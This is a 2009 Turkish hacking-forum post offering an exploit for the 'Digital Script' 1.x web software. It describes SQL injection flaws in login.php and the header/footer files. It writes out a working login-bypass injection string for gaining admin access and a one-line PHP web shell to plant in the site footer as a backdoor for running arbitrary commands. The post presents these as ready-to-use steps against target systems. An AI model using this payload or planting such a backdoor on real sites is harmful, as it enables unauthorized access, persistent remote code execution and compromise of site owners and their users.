|
|||||||
| Exploitler Exploitler hakkında bilmek istedikleriniz. |
 | ||
 |
|
|
Seçenekler | Stil |
  Digital Script SQL Enjection Exp | ||||||||||
|
(#1)
|
|||||||||
|
Üye
 
Mesaj Sayısı: 1,354
Level: 31 [  ]Paylaşım: 153 / 767
Üyelik tarihi: Feb 2008
Kullanıcı No: 257856
Nerden: Tüm SHT Kendinize İyi Bakın.!
Tecrübe Puanı: 2191
REP Puanı : 106940
REP Seviyesi :
  |
Digital Script SQL Enjection Exp -
06-27-2009
Digital Script SQL Enjection Exp
Digital Script "username" SQL Injection Exploit Seviye : Normal Etki : Güvenlik Sıfırlama // Security bypass // Etkilenen Sistem : Dijital Script 1.x serisi . >> [Linkleri Sadece Üyeler Görebilir..] Bilgi ( Tanımlama ) : Ünlü kullanıcı Platforumlarından Dijital Script’de (yazılımda) 2 tane SQL Injection açığı bulunduğu raporlanmıştır. 1. Açık : " username " parametresindeki " login.php " bölümündeki kodlama hatalarindan dolayı meydana gelmiştir. 2. Açık : " Header.php ve Footer.php " klasöründeki kodlama hatalarindan meydana gelmiştir. Ayrıntılı Bilgi için : [Linkleri Sadece Üyeler Görebilir..] Adresine bakabilirsiniz. >> Exploit ( Örnek kodlama / açık / bug ) 1) Login Bypass / SQL Injection ************************************************ login as admin typing: login: " or isnull(1/0) /* password: [whatever] ) remote code execution ************************************************** ***** now you can edit template and leave a backdoor on target system: at the end of the footer try this: ( Hedef sisteme arka kapıyı yerleştireceksiniz, Sizin kodlarinizi. ) <?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?> then you can launch commands: [Linkleri Sadece Üyeler Görebilir..] Şeklindedir. |
|||||||||
|
||||||||||
 | ||||||||||
|
|
|
| Seçenekler | |
| Stil | |
|
|
Normal
